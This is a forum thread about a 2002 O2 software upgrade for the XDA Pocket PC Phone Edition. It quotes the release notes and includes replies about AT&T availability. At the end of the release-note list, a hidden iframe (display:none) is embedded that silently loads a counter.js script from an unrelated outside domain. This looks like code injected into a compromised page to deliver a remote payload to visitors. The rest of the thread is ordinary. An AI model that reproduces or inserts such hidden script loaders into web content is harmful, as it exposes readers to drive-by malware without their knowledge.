New SW release for O2

I wonder if this upgrade will be coming soon to AT&T (or is this the current AT&T version????)

December 17, 2002; [PocketPC Phone Edition]
This upgrade is supposed to be used by xda users from Asia (Singapore and other countries from this region).
The newest release of software has the following main enhancements to some of the earlier versions:
Higher GPRS data rates. Latest software will improve the data rates on your device and speed up the receipt of e-mails and Internet browsing. GPRS 4+1 support.
SIM manager. Phone numbers imported from the SIM card are saved by default as mobile numbers instead of work numbers. This will allow you to send an SMS message directly from Contacts, without having to change the number type to mobile.
Improved power management with regards to retaining the GPRS connection. A new feature allowing you to choose if you want the GPRS connection to remain active once the xda enters power save mode. On previous software version, the GPRS connection was discontinued at the time the device entered a power save mode. This feature can be found under Settings->System
PAP/CHAP selection. This new feature allows you to choose the type of authentication for your GPRS connection. PAP authentication is a less sophisticated level using clear text password protection; CHAP authentication is used to negotiate the most secure form of encrypted authentication supported by both server and client. The level of authentication required depends on your network provider. This setting can be found under Settings->Connections
Circuit Switched Data (CSD) call type. This new feature allows you to use either Analogue or ISDN connection for your data calls. The required setting depends on your network operator. This setting can be found under Settings->Connections
Additional operators´ network settings are now supported in the auto configuration application. The following operators settings are included: 1010, New World Mobility, One2Free, Orange, SmarTone, Optus, Telstra, M1,SingTel, StarHub, Celcom, DiGi, Maxis, TIMECel, CTM, Others. If you find your operator from the list, you can configure your xda just by a press of a button. No manual intervention is required. This feature can be found under Settings->System. If your operator is not on the list, you can configure your local connectivity settings manually. You can do this by going to Settings->Connections->Connections
A fix for auto-configurator causing calendar events and e-mails to advance by 1 hour when synchronised from PC Outlook to XDA
Enhancements to GSM and GPRS capabilities - such as IP header compression
Improvements incorporated into the latest Microsoft Pocket PC 2002 Phone Edition such as
New Media Player
Significant performance and quality enhancements
A new skin
Improved playlist management
More robust streaming support
Enhanced connectivity integration
Additional improvements in overall system performance
DES56 cipher improvement for accessing secure Internet sites
Tab key is now supported in Pocket Internet Explorer
Correction to date/time of incoming SMS<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

this may answer, otherwise Lazarus will be at your service

This thread may give you some info, otherwise I've asked Lazarus to answer. He knows the AT&T Phone Edition better than anyone else on the planet...

By the way, could you post a URL with that announcement so that we can add it to the FAQ... or better yet, just add the url to the FAQ directly.... HERE

Upgrades

The latest round of upgrades for T-Mobile and O2 are basically playing catch up with AWS. We waited far longer to launch the product because it did not meet my quality requirements.

The good news for everyone not on AWS is that all the work HTC and I put in you will benefit from.

I am currently working on an upgrade for the AWS version that further improves the device. That is about all I can say and cannot give a schedule on this. Again I will wait until I think the quality is such that it should be released.

Hope that helps!
